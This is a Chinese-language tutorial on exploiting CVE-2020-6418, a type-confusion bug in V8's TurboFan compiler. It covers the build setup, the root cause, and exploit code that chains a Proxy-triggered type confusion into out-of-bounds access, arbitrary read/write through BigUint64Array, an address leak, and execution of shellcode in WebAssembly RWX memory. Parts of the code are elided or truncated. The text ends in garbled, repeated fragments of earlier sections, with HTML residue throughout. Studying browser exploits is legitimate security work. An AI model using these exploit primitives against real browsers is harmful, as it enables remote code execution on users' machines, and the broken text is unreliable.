CVE-2020-6418 V8漏洞分析与利用教学文档<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-6418是V8引擎中的一个JIT优化漏洞，属于TurboFan优化过程中对JSCreate操作码的副作用判断错误导致的类型混淆漏洞。该漏洞允许攻击者通过精心构造的JavaScript代码实现类型混淆，最终可导致任意代码执行。<\/p>

2. 环境搭建<\/h2>

2.1 所需工具<\/h3>

代理工具（如酸酸乳）<\/li>
Git 2.22.0.windows.1<\/li>
Curl 7.55.1<\/li>

Windows 10专业版<\/li> <\/ul>

2.2 配置步骤<\/h3>

代理配置<\/strong>：<\/p>

git config --global https.proxy socks5:\/\/127.0.0.1:1080
<\/span><\/span>git config --global http.proxy socks5:\/\/127.0.0.1:1080
<\/span><\/span>git config --global git.proxy socks5:\/\/127.0.0.1:1080
<\/span><\/span>set HTTP_PROXY=<\/span>socks5:\/\/127.0.0.1:1080
<\/span><\/span>set HTTPS_PROXY=<\/span>socks5:\/\/127.0.0.1:1080
<\/span><\/span><\/code><\/pre><\/li>

depot_tools安装<\/strong>：<\/p>
git clone https:\/\/chromium.googlesource.com\/chromium\/tools\/depot_tools.git
<\/span><\/span>set DEPOT_TOOLS_WIN_TOOLCHAIN=<\/span>0<\/span>
<\/span><\/span>set GYP_MSVS_VERSION=<\/span>2019<\/span>
<\/span><\/span><\/code><\/pre><\/li>

V8源码下载与编译<\/strong>：<\/p>
fetch v8
<\/span><\/span>cd v8
<\/span><\/span>git reset --hard bdaa7d66a37adcc1f1d81c9b0f834327a74ffe07
<\/span><\/span>gclient sync
<\/span><\/span>python tools\d<\/span>ev\v<\/span>8gen.py x64.release
<\/span><\/span>python tools\d<\/span>ev\v<\/span>8gen.py x64.debug
<\/span><\/span>python tools\d<\/span>ev\g<\/span>m.py x64.debug d8
<\/span><\/span>python tools\d<\/span>ev\g<\/span>m.py x64.release d8
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 背景知识<\/h2>
3.1 指针压缩技术<\/h3>
新版本V8采用指针压缩技术提高性能：<\/p>

Smi<\/strong>：32位指针，最后1bit为pointer tag<\/li>
Object<\/strong>：分为两部分表示

32位指针中保存低32位地址<\/li>
高32位保存在r13寄存器中作为base<\/li>
<\/ul>
<\/li>
<\/ul>
3.2 BigUint64Array<\/h3>
用于操作8字节内存，比Float64Array更方便：<\/p>

data_ptr = external_pointer + base_pointer<\/code><\/li>
控制这两个指针可实现任意地址读写<\/li>
<\/ul>
3.3 Inlining优化<\/h3>
TurboFan的两种内联方式：<\/p>

General Inlining<\/strong>：处理用户代码内联<\/li>
Builtin Inlining<\/strong>：处理JS内置函数内联<\/li>
<\/ol>
4. 漏洞分析<\/h2>
4.1 漏洞根源<\/h3>
InferReceiverMapsUnsafe<\/code>函数错误地将JSCreate<\/code>节点标记为kReliableReceiverMaps<\/code>（可靠），而实际上JSCreate<\/code>可能有副作用（如查找原型对象），应标记为kUnreliableReceiverMaps<\/code>（不可靠）。<\/p>
4.2 漏洞触发流程<\/h3>

通过Reflect.construct<\/code>将JSCreate<\/code>节点加入effect chain<\/li>
JIT优化时调用InferReceiverMapsUnsafe<\/code>判断可靠性<\/li>
由于错误判断，未加入MapsCheck<\/code>节点检查类型<\/li>
通过回调函数修改数组类型后，优化代码仍使用旧类型<\/li>
<\/ol>
4.3 关键代码<\/h3>
\/\/ src\/compiler\/node-properties.cc
<\/span><\/span><\/span><\/span>NodeProperties::<\/span>InferReceiverMapsResult NodeProperties::<\/span>InferReceiverMapsUnsafe(
<\/span><\/span>    JSHeapBroker*<\/span> broker, Node*<\/span> receiver, Node*<\/span> effect,
<\/span><\/span>    ZoneHandleSet<<\/span>Map>*<\/span> maps_return) {
<\/span><\/span>  InferReceiverMapsResult result =<\/span> kReliableReceiverMaps;
<\/span><\/span>  while<\/span> (true) {
<\/span><\/span>    switch<\/span> (effect-><\/span>opcode()) {
<\/span><\/span>      case<\/span> IrOpcode::<\/span>kJSCreate: {
<\/span><\/span>        \/\/ 漏洞修复前错误地保持kReliableReceiverMaps
<\/span><\/span><\/span><\/span>        \/\/ 修复后应改为: result = kUnreliableReceiverMaps;
<\/span><\/span><\/span><\/span>        break<\/span>;
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 漏洞利用<\/h2>
5.1 从类型混淆到越界读写<\/h3>

创建HOLEY_DOUBLE_ELEMENTS数组<\/li>
通过Proxy回调修改为HOLEY_ELEMENTS数组<\/li>
利用类型混淆实现越界读写<\/li>
<\/ol>
let<\/span> vuln_array<\/span> =<\/span> [,,,,,,,,,,,, 6.1<\/span>, 7.1<\/span>, 8.1<\/span>];
<\/span><\/span>var<\/span> oob_array<\/span>;
<\/span><\/span>
<\/span><\/span>function<\/span> f<\/span>(p<\/span>) {
<\/span><\/span>    vuln_array<\/span>.push<\/span>(typeof<\/span>(Reflect<\/span>.construct<\/span>(empty<\/span>, arguments<\/span>, p<\/span>)) ===<\/span> Proxy ?<\/span> 0.2<\/span> :<\/span> 2.42902434121390450978968281326<\/span>E<\/span>-<\/span>319<\/span>*<\/span>2<\/span>);
<\/span><\/span>    \/\/ 触发JIT...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>let<\/span> p<\/span> =<\/span> new<\/span> Proxy(Object, {
<\/span><\/span>    get<\/span>:<\/span> () => {
<\/span><\/span>        vuln_array<\/span>[0<\/span>] =<\/span> {}; \/\/ 修改类型
<\/span><\/span><\/span><\/span>        oob_array<\/span> =<\/span> [1.1<\/span>];  \/\/ 目标数组
<\/span><\/span><\/span><\/span>        return<\/span> Object.prototype<\/span>;
<\/span><\/span>    }
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>5.2 构造任意地址读写<\/h3>

创建BigUint64Array对象<\/li>
通过越界读写修改其external_pointer<\/code>和base_pointer<\/code><\/li>
实现任意地址读写原语<\/li>
<\/ol>
function<\/span> get_arw<\/span>() {
<\/span><\/span>    uint64_length_offset<\/span> =<\/span> 16<\/span>;
<\/span><\/span>    uint64_externalptr_offset<\/span> =<\/span> 17<\/span>;
<\/span><\/span>    uint64_baseptr_offset<\/span> =<\/span> 18<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 保存原始值
<\/span><\/span><\/span><\/span>    uint64_length<\/span> =<\/span> f2i<\/span>(oob_array<\/span>[uint64_length_offset<\/span>]);
<\/span><\/span>    uint64_externalptr_ptr<\/span> =<\/span> f2i<\/span>(oob_array<\/span>[uint64_externalptr_offset<\/span>]);
<\/span><\/span>    uint64_baseptr_ptr<\/span> =<\/span> f2i<\/span>(oob_array<\/span>[uint64_baseptr_offset<\/span>]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> arw_write<\/span>(addr<\/span>, payload<\/span>) {
<\/span><\/span>    oob_array<\/span>[uint64_length_offset<\/span>] =<\/span> i2f<\/span>(BigInt<\/span>(payload<\/span>.length<\/span>));
<\/span><\/span>    oob_array<\/span>[uint64_baseptr_offset<\/span>] =<\/span> i2f<\/span>(0<\/span>n<\/span>);
<\/span><\/span>    oob_array<\/span>[uint64_externalptr_offset<\/span>] =<\/span> i2f<\/span>(addr<\/span>);
<\/span><\/span>    \/\/ 写入payload...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.3 地址泄露<\/h3>
通过布置对象实现地址泄露：<\/p>
obj_leaker<\/span> =<\/span> {
<\/span><\/span>    a<\/span>:<\/span> 0xc00c<\/span>\/<\/span>2<\/span>,
<\/span><\/span>    b<\/span>:<\/span> oob_array<\/span>,
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>function<\/span> addr_of<\/span>(obj<\/span>) {
<\/span><\/span>    obj_leaker<\/span>.b<\/span> =<\/span> obj<\/span>;
<\/span><\/span>    let<\/span> half<\/span> =<\/span> f2half<\/span>(oob_array<\/span>[obj_leader_offset<\/span>]);
<\/span><\/span>    if<\/span> (half<\/span>[0<\/span>] ==<\/span> 0xc00c<\/span>) {
<\/span><\/span>        return<\/span> BigInt<\/span>(half<\/span>[1<\/span>]);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5.4 任意代码执行<\/h3>

加载WebAssembly模块获取RWX内存<\/li>
通过任意地址写将shellcode写入RWX内存<\/li>
调用wasm函数执行shellcode<\/li>
<\/ol>
function<\/span> get_wasm_rwx<\/span>() {
<\/span><\/span>    wasm_module<\/span> =<\/span> new<\/span> WebAssembly<\/span>.Module<\/span>(wasm_code<\/span>);
<\/span><\/span>    wasm_instance<\/span> =<\/span> new<\/span> WebAssembly<\/span>.Instance<\/span>(wasm_module<\/span>, {});
<\/span><\/span>    wasm_function<\/span> =<\/span> wasm_instance<\/span>.exports<\/span>.main<\/span>;
<\/span><\/span>    wasm_function_addr<\/span> =<\/span> addr_of<\/span>(wasm_function<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 遍历指针链获取RWX内存地址...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> run_shellcode<\/span>() {
<\/span><\/span>    var<\/span> shellcode<\/span> =<\/span> unescape<\/span>("%u48fc..."<\/span>);
<\/span><\/span>    arw_write<\/span>(wasm_rwx<\/span>, shellcode<\/span>);
<\/span><\/span>    wasm_function<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 完整利用链<\/h2>

触发类型混淆<\/li>
构造越界读写<\/li>
获取任意地址读写能力<\/li>
泄露wasm函数地址<\/li>
获取RWX内存地址<\/li>
写入并执行shellcode<\/li>
<\/ol>
7. 防御措施<\/h2>

正确标记有副作用的操作码<\/li>
加强类型检查<\/li>
限制JIT优化中的假设条件<\/li>
<\/ol>
8. 参考资源<\/h2>

Pointer Compression in V8<\/a><\/li>
BigUint64Array文档<\/a><\/li>
TurboFan编译器概述<\/a><\/li>
<\/ol>

CVE-2020-6418 V8漏洞分析与利用教学文档<\/h1>

2. 环境搭建<\/h2>

3. 背景知识<\/h2>

4. 漏洞分析<\/h2>

4.1 漏洞根源<\/h3> InferReceiverMapsUnsafe<\/code>函数错误地将JSCreate<\/code>节点标记为kReliableReceiverMaps<\/code>（可靠），而实际上JSCreate<\/code>可能有副作用（如查找原型对象），应标记为kUnreliableReceiverMaps<\/code>（不可靠）。<\/p>

5. 漏洞利用<\/h2>

7. 防御措施<\/h2> 正确标记有副作用的操作码<\/li> 加强类型检查<\/li> 限制JIT优化中的假设条件<\/li> <\/ol> 8. 参考资源<\/h2> Pointer Compression in V8<\/a><\/li> BigUint64Array文档<\/a><\/li> TurboFan编译器概述<\/a><\/li> <\/ol>

8. 参考资源<\/h2> Pointer Compression in V8<\/a><\/li> BigUint64Array文档<\/a><\/li> TurboFan编译器概述<\/a><\/li> <\/ol>

4.1 漏洞根源<\/h3>
`InferReceiverMapsUnsafe<\/code>函数错误地将JSCreate<\/code>节点标记为kReliableReceiverMaps<\/code>（可靠），而实际上JSCreate<\/code>可能有副作用（如查找原型对象），应标记为kUnreliableReceiverMaps<\/code>（不可靠）。<\/p>`

7. 防御措施<\/h2>

正确标记有副作用的操作码<\/li>
加强类型检查<\/li>
限制JIT优化中的假设条件<\/li> <\/ol>
8. 参考资源<\/h2>

Pointer Compression in V8<\/a><\/li>
BigUint64Array文档<\/a><\/li>
TurboFan编译器概述<\/a><\/li> <\/ol>

8. 参考资源<\/h2>

Pointer Compression in V8<\/a><\/li>
BigUint64Array文档<\/a><\/li>
TurboFan编译器概述<\/a><\/li> <\/ol>